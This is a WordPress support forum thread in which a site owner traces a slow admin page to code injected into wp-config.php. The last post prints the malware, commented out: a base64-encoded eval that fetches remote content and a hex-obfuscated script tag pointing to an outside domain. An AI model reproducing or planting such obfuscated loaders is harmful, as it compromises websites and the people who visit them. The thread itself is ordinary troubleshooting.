WordPress.org

Forums

The Support Forums will be in read-only mode for a scheduled maintenance window on 01 September 2016 14:00 UTC - 20:00 UTC. More information.

wp-admin trying to open weird website (6 posts)

  1. petrike
    Member
    Posted 2 years ago #

    Hi,

    This just recently started to happen. When I'm opening up my wp-admin page I can see with FireFox status line that browser is also trying to open webpage 'www.bestlovequotesandpoems.com'. There is no such domain and this is causing a long delay going to the actual wp admin dashboard. This happens from other computers as well so this is not any local fault.

    What might be causing this and where to look this link? I have downloaded all WP files to my local computer and tried to search this domain name within files but it's not in any php or js files.

    Any help appreciated.

    -pete

  2. Mark Senff
    Member
    Posted 2 years ago #

    Disable all plugins and revert to a default theme (TwentyThirteen, TwentyFourteen, etc.) and see if it still happens.

    If yes, you may have been hacked.

    If not, enable plugins one at a time to check which one might be the cause of it.

  3. petrike
    Member
    Posted 2 years ago #

    Disabled all plugins but when trying to change theme to TwentyFourteen I get this warning and it stops there:

    Warning: Cannot modify header information - headers already sent by (output started at /home/kehusmaa/public_html/wp-config.php(91) : eval()'d code:1) in /home/kehusmaa/public_html/wp-includes/pluggable.php on line 896

  4. JumboClicks
    Member
    Posted 2 years ago #

    look at the bottom of your wp-config.php file
    there should not be any empty lines or spaces after the last line

  5. petrike
    Member
    Posted 2 years ago #

    What should be the last line of wp-config.php file?

  6. petrike
    Member
    Posted 2 years ago #

    Found my problem. I had these two lines added at the end of wp-config.php file (I commented them out and all works now):
    /** eval(base64_decode('ZWNobyBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cud3AtdXBkYXRlLm5ldC9hdXRvLnBocD91cmw9Ii4kX1NFUlZFUlsiU0VSVkVSX05BTUUiXSk7'));
    * echo "\x20\x3c\x53C\x52IP\x54 SRC\x3dh\x74\x74p://ww\x77\x2ebe\x73\x74love\x71uote\x73a\x6ed\x70o\x65\x6ds.co\x6d/\x63oki\x74\x2ejs\x3e\x3c/SC\x52I\x50\x54\x3e\n";
    */

    I don't know who and how was able to hack this file.

Topic Closed

This topic has been closed to new replies.

About this Topic